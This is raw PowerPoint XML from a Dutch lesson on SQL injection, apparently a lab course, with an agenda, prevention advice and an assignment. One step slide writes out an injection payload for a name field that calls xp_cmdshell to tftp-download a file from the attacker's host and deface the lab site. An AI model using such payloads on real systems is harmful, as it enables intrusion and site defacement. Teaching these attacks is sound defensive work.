              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>financiële schade, onzekerheid.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207707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5205045" y="1096894"/>
            <a:ext cx="6712299" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Toegang verschaffen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"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Toegang verschaffen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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Sluit de browser als die nog open is en open deze vervolgens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             Vul de volgende tekst is in het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> veld: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -i 10.0.0.1 GET konfamapes.jpg </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      c:\xampp\htdocs\OranjeWS\konfam.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                         </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886950" y="5097641"/>
            <a:ext cx="7538404" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit commando importeert een plaatje vanuit de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacker's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> machine en zet deze in de website die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>gedefaced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> gaat worden..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Tekstvak 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519431" y="6092200"/>
            <a:ext cx="6496276" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de pagina http://10.0.0.25/OranjeWS/homepage.html </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="668228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dirty="0" smtClean="0"/>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testomgeving opzetten/bekijken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Illegaal inloggen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Beschadigen van informatie (merkbaar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Beschadigen van informatie (niet meteen merkbaar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Manipuleren van een website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Toegang verschaffen tot een machine</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> voorkomen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>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978341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SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>voorkomen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor inhoud 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688937" y="1747269"/>
            <a:ext cx="8136880" cy="4590034"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1"/>
              <a:t>Sanatize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>de  invoer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>verwijder alle karakters die "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>foul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>suggeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>,…)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>: niet alleen het karakter, ook de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> equivalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Gebruik geen dynamische SQL commando's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Gebruik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>zgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>met parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Gebruik geen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> voor de connectie. Beperk de rechten.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>niet altijd eenvoudig te configureren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1"/>
              <a:t>Encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>vertrouwelijke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" smtClean="0"/>
              <a:t>Beperk invoerlengte van velden</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Tijdelijke aanduiding voor inhoud 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Afbeelding 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3787922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96054" y="1380932"/>
            <a:ext cx="4108120" cy="1433065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection nog steeds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Tijdelijke aanduiding voor inhoud 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Attack Techniques Oct 2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741" y="1870574"/>
            <a:ext cx="7372508" cy="3882939"/>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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1940970" y="5876818"/>
            <a:ext cx="5412639" cy="777678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Afbeelding 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="172682" y="3066106"/>
            <a:ext cx="4265756" cy="2434906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Afbeelding 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4436556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rgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="762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5205045" y="1096894"/>
            <a:ext cx="6712299" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht: voorkom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</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a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht</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Omschrijving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
